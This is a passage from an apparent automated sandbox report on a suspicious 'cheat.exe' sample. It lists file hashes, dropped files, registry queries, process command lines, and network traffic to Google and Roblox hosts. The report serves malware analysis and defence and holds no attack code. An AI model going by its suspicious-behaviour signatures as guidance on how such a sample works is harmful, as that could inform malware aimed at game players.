| SHA1 | 50f858caa7f4ac3a93cf141a5d15b4edeb447ee7 |
| SHA256 | 57e3b0d22fa619da90237d8bcf8f922b142c9f6abf47efc5a1f5b208c4d3f023 |
| SHA512 | 6b678f0dd0030806effe6825fd52a6a30b951e0c3dcf91dfd7a713d387aa8b39ec24368e9623c463360acba5e929e268f75ce996526c5d4485894b8ac6b2e0fa |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Downloads\RenameEnable.doc
| MD5 | f62b4be617a96afe2ce3676890ba7379 |
| SHA1 | b7a114f417185c2948b8ca77d72ae6c3e40e3f02 |
| SHA256 | 1616dc61bf092b25d991c7722028e42f98587757af6276c288a7b010179ff427 |
| SHA512 | 2f3917c192cdbd5daefb3ad4bbe1d42688ddd561965d25d056ed0e9fd8b4357061733ea0f6dd78163aefea94be64f213a4834508aa6b36d30b99862527c4655f |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Downloads\StopBackup.wpl
| MD5 | ec9d665964532c8e74d99a330b83e982 |
| SHA1 | 10c27bd440f25b4b8baa3dcae6b28acafcadc7a3 |
| SHA256 | 4cb1929e80e09230c1a1dd2bf97aede8d2742b85dcecb44ad8e88db72c0a3b77 |
| SHA512 | 8d97e9cfd2488bc6b39bc9c78973901602a260f48656d261596f869cf4e9dce3bd553d833390f8cc436cdb022edf1c4eb6cfe66e5245bae452228730980ef177 |
memory/4188-285-0x00007FFFD18E0000-0x00007FFFD1A57000-memory.dmp
memory/4188-296-0x00007FFFD1C00000-0x00007FFFD21E9000-memory.dmp
memory/4188-307-0x00007FFFD0F80000-0x00007FFFD14A0000-memory.dmp
memory/4188-311-0x00007FFFE1260000-0x00007FFFE1279000-memory.dmp
memory/4188-306-0x00007FFFD14A0000-0x00007FFFD156D000-memory.dmp
memory/4188-305-0x00007FFFE08B0000-0x00007FFFE08E3000-memory.dmp
memory/4188-297-0x00007FFFE4CD0000-0x00007FFFE4CF3000-memory.dmp
memory/4188-327-0x00007FFFD0970000-0x00007FFFD0A8C000-memory.dmp
memory/4188-337-0x00007FFFD14A0000-0x00007FFFD156D000-memory.dmp
memory/4188-340-0x00007FFFE13F0000-0x00007FFFE13FD000-memory.dmp
memory/4188-339-0x00007FFFE11F0000-0x00007FFFE1204000-memory.dmp
memory/4188-338-0x00007FFFD0F80000-0x00007FFFD14A0000-memory.dmp
memory/4188-336-0x00007FFFE08B0000-0x00007FFFE08E3000-memory.dmp
memory/4188-335-0x00007FFFE16D0000-0x00007FFFE16DD000-memory.dmp
memory/4188-334-0x00007FFFE1260000-0x00007FFFE1279000-memory.dmp
memory/4188-333-0x00007FFFD18E0000-0x00007FFFD1A57000-memory.dmp
memory/4188-332-0x00007FFFE1480000-0x00007FFFE14A3000-memory.dmp
memory/4188-331-0x00007FFFE1540000-0x00007FFFE1559000-memory.dmp
memory/4188-330-0x00007FFFE1750000-0x00007FFFE177D000-memory.dmp
memory/4188-329-0x00007FFFE6C60000-0x00007FFFE6C6F000-memory.dmp
memory/4188-328-0x00007FFFE4CD0000-0x00007FFFE4CF3000-memory.dmp
memory/4188-312-0x00007FFFD1C00000-0x00007FFFD21E9000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-19 14:53
Reported
2024-06-19 14:56
Platform
win7-20231129-en
Max time kernel
119s
Max time network
128s
Command Line
Signatures
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\release\main\cheat.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1\Component Information | C:\Windows\system32\csrss.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\Configuration Data | C:\Windows\system32\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\MultifunctionAdapter\0\KeyboardController | C:\Windows\system32\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1\Configuration Data | C:\Windows\system32\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0\Component Information | C:\Windows\system32\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter | C:\Windows\system32\csrss.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1\Identifier | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2\Component Information | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\Component Information | C:\Windows\system32\csrss.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral | C:\Windows\system32\csrss.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 | C:\Windows\system32\csrss.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController | C:\Windows\system32\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0 | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\Identifier | C:\Windows\system32\csrss.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2\Identifier | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2\Configuration Data | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\Identifier | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\Configuration Data | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0\Configuration Data | C:\Windows\system32\csrss.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\Component Information | C:\Windows\system32\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\MultifunctionAdapter\1\KeyboardController | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0\Identifier | C:\Windows\system32\csrss.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 | C:\Windows\system32\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 | C:\Windows\system32\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\MultifunctionAdapter\0\KeyboardController\0 | C:\Windows\system32\csrss.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\ThemeManager\LastLoadedDPI = "96" | C:\Windows\system32\winlogon.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\ThemeManager\DllName = "%SystemRoot%\\resources\\themes\\Aero\\Aero.msstyles" | C:\Windows\system32\winlogon.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\ThemeManager\ColorName = "NormalColor" | C:\Windows\system32\winlogon.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\ThemeManager | C:\Windows\system32\winlogon.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\ThemeManager\ThemeActive = "1" | C:\Windows\system32\winlogon.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\ThemeManager\LoadedBefore = "1" | C:\Windows\system32\winlogon.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\MachinePreferredUILanguages = 65006e002d00550053000000 | C:\Windows\system32\winlogon.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\ThemeManager\LastUserLangID = "1033" | C:\Windows\system32\winlogon.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\ThemeManager\SizeName = "NormalSize" | C:\Windows\system32\winlogon.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\release\main\cheat.exe
"C:\Users\Admin\AppData\Local\Temp\release\main\cheat.exe"
C:\Users\Admin\AppData\Local\Temp\release\main\cheat.exe
"C:\Users\Admin\AppData\Local\Temp\release\main\cheat.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6929758,0x7fef6929768,0x7fef6929778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1108 --field-trial-handle=1160,i,16182142942030288597,11281137658957791545,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1404 --field-trial-handle=1160,i,16182142942030288597,11281137658957791545,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1452 --field-trial-handle=1160,i,16182142942030288597,11281137658957791545,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2272 --field-trial-handle=1160,i,16182142942030288597,11281137658957791545,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2288 --field-trial-handle=1160,i,16182142942030288597,11281137658957791545,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1556 --field-trial-handle=1160,i,16182142942030288597,11281137658957791545,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1632 --field-trial-handle=1160,i,16182142942030288597,11281137658957791545,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3432 --field-trial-handle=1160,i,16182142942030288597,11281137658957791545,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3648 --field-trial-handle=1160,i,16182142942030288597,11281137658957791545,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3612 --field-trial-handle=1160,i,16182142942030288597,11281137658957791545,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3920 --field-trial-handle=1160,i,16182142942030288597,11281137658957791545,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3896 --field-trial-handle=1160,i,16182142942030288597,11281137658957791545,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3432 --field-trial-handle=1160,i,16182142942030288597,11281137658957791545,131072 /prefetch:1
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
C:\Windows\system32\csrss.exe
%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | pki.goog | udp |
| US | 8.8.8.8:53 | pki.goog | udp |
| US | 216.239.32.29:80 | pki.goog | tcp |
| US | 216.239.32.29:80 | pki.goog | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.200.14:443 | apis.google.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | ogs.google.com | udp |
| GB | 142.250.187.238:443 | ogs.google.com | tcp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| GB | 172.217.169.3:443 | ssl.gstatic.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn2.gstatic.com | udp |
| GB | 142.250.180.14:443 | encrypted-tbn2.gstatic.com | tcp |
| GB | 172.217.169.46:443 | play.google.com | udp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 142.250.187.202:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | www.roblox.com | udp |
| GB | 128.116.119.4:443 | www.roblox.com | tcp |
| GB | 128.116.119.4:443 | www.roblox.com | tcp |
| US | 8.8.8.8:53 | css.rbxcdn.com | udp |
| US | 8.8.8.8:53 | static.rbxcdn.com | udp |
| US | 8.8.8.8:53 | js.rbxcdn.com | udp |
| IT | 108.157.188.91:443 | css.rbxcdn.com | tcp |
| IT | 108.157.188.91:443 | css.rbxcdn.com | tcp |
| IT | 108.157.188.91:443 | css.rbxcdn.com | tcp |
| IT | 108.157.188.91:443 | css.rbxcdn.com | tcp |
| IT | 108.157.188.91:443 | css.rbxcdn.com | tcp |
| IT | 108.157.188.91:443 | css.rbxcdn.com | tcp |
| BE | 2.17.107.35:443 | js.rbxcdn.com | tcp |
| BE | 2.17.107.35:443 | js.rbxcdn.com | tcp |
| BE | 2.17.107.35:443 | js.rbxcdn.com | tcp |
| BE | 2.17.107.35:443 | js.rbxcdn.com | tcp |
| BE | 2.17.107.35:443 | js.rbxcdn.com | tcp |
| BE | 2.17.107.35:443 | js.rbxcdn.com | tcp |
| BE | 2.17.107.217:443 | static.rbxcdn.com | tcp |
| US | 8.8.8.8:53 | roblox.com | udp |
| GB | 128.116.119.4:443 | roblox.com | udp |
| US | 8.8.8.8:53 | roblox-api.arkoselabs.com | udp |
| IT | 18.66.196.76:443 | roblox-api.arkoselabs.com | tcp |
| US | 8.8.8.8:53 | metrics.roblox.com | udp |
| US | 8.8.8.8:53 | apis.roblox.com | udp |
| IT | 18.66.196.76:443 | roblox-api.arkoselabs.com | udp |
| GB | 128.116.119.4:443 | apis.roblox.com | tcp |
| US | 8.8.8.8:53 | ecsv2.roblox.com | udp |
| US | 8.8.8.8:53 | apis.rbxcdn.com | udp |
| BE | 23.14.90.81:443 | apis.rbxcdn.com | tcp |
| US | 8.8.8.8:53 | locale.roblox.com | udp |
| US | 8.8.8.8:53 | images.rbxcdn.com | udp |
| IT | 108.157.188.91:443 | css.rbxcdn.com | tcp |
| GB | 128.116.119.4:443 | locale.roblox.com | udp |
| BE | 2.17.107.219:443 | images.rbxcdn.com | tcp |
| BE | 2.17.107.219:443 | images.rbxcdn.com | tcp |
| BE | 2.17.107.219:443 | images.rbxcdn.com | tcp |
| BE | 2.17.107.219:443 | images.rbxcdn.com | tcp |
| BE | 2.17.107.219:443 | images.rbxcdn.com | tcp |
| BE | 2.17.107.219:443 | images.rbxcdn.com | tcp |
| US | 8.8.8.8:53 | auth.roblox.com | udp |
| BE | 2.17.107.219:443 | images.rbxcdn.com | tcp |
| GB | 142.250.187.202:443 | content-autofill.googleapis.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI11602\python311.dll
| MD5 | 5f6fd64ec2d7d73ae49c34dd12cedb23 |
| SHA1 | c6e0385a868f3153a6e8879527749db52dce4125 |
| SHA256 | ff9f102264d1944fbfae2ba70e7a71435f51a3e8c677fd970b621c4c9ea71967 |
| SHA512 | c4be2d042c6e4d22e46eacfd550f61b8f55814bfe41d216a4df48382247df70bc63151068513855aa78f9b3d2f10ba6a824312948324c92de6dd0f6af414e8ab |
memory/1696-23-0x000007FEF5810000-0x000007FEF5DF9000-memory.dmp
\??\pipe\crashpad_2692_FCNCLYWZOYWRIPGQ
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp
| MD5 | 18e723571b00fb1694a3bad6c78e4054 |
| SHA1 | afcc0ef32d46fe59e0483f9a3c891d3034d12f32 |
| SHA256 | 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa |
| SHA512 | 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp
| MD5 | aefd77f47fb84fae5ea194496b44c67a |
| SHA1 | dcfbb6a5b8d05662c4858664f81693bb7f803b82 |
| SHA256 | 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611 |
| SHA512 | b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3 |
C:\Users\Admin\AppData\Local\Temp\Tar68D6.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a266bb7dcc38a562631361bbf61dd11b |
| SHA1 | 3b1efd3a66ea28b16697394703a72ca340a05bd5 |
| SHA256 | df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e |
| SHA512 | 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | 6ba195bee0238cc929a109a6b9b8bca3 |
| SHA1 | cec20ae4fd054ee5d3a65d278b5163666fe5876d |
| SHA256 | 8bc1860167cebe78183313bd9c0fd7b49b5df75bd2fca2cdc0547bf535f511ce |
| SHA512 | ab4a241d72cc3a83bd31862aa2935c20ac259a22c354e067a6e3e975473c349e8b3a52569c284c90d46733a56417759c2f40543421ae1faea82c466221b3dc4d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 0499e9f9c5ee6415c1fc777c6d8428a7 |
| SHA1 | a996e40a66a54c5712cccf3b8a56803cdaa968ce |
| SHA256 | ed3f708791fac6f605287a9abf21a2c5ea6debacf2e2a27fa82a785da543ba7e |
| SHA512 | 1f56c2f5774a01a98841c74ee8aaf86b60340b26e969b549d2e2142b299f9edf87d299aa9ca8a55188681fec26a7e0b03f85e6b8610b22b6de220427c2cdbc78 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | d5e1e6e66e3a3539a8e35a2671a465c0 |
| SHA1 | d5382bbb6a4f5dd828fd74e8ee758f70a952249a |
| SHA256 | fba7038a3070438a36c9a5bfe4b5ebab53269fda9cff35b3c4782ec0b2403bc9 |
| SHA512 | 8a96763361df79e97400a7dda901bcea853ab729c35b54ee622f87958bb6bdf249dab002ba38f4580827bd2c18a86035982ea9eb246885d94e849d8a269b82ff |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\070E0202839D9D67350CD2613E78E416
| MD5 | 55540a230bdab55187a841cfe1aa1545 |
| SHA1 | 363e4734f757bdeb89868efe94907774a327695e |
| SHA256 | d73494e3446b02167573b3cde3ae1c8584ac26e15e45ac3ec0326708425d90fb |
| SHA512 | c899cb1d31d3214fd9dc8626a55e40580d3b2224bf34310c2abd85d0f63e2dedaeae57832f048c2f500cb2cbf83683fcb14139af3f0b5251606076cdb4689c54 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\070E0202839D9D67350CD2613E78E416
| MD5 | d38bb1d7791f65bfd5c1e20e84f88779 |
| SHA1 | 4d7a9782d4a3c99d7f97b0c49384b953b5ffd822 |
| SHA256 | 42b859c5987b4521f0564f96ae51c9661cc7291eae7cca414662b5fcc36c62d5 |
| SHA512 | 6bb18e48cef873d53b1d2689a6ee5c3e0afb581ac48cb5771b5fccf50a16d3b32833996641ace4cbcf7d8f3e1f5fd03e19ac27f3617b32672bffec4327f4adf6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
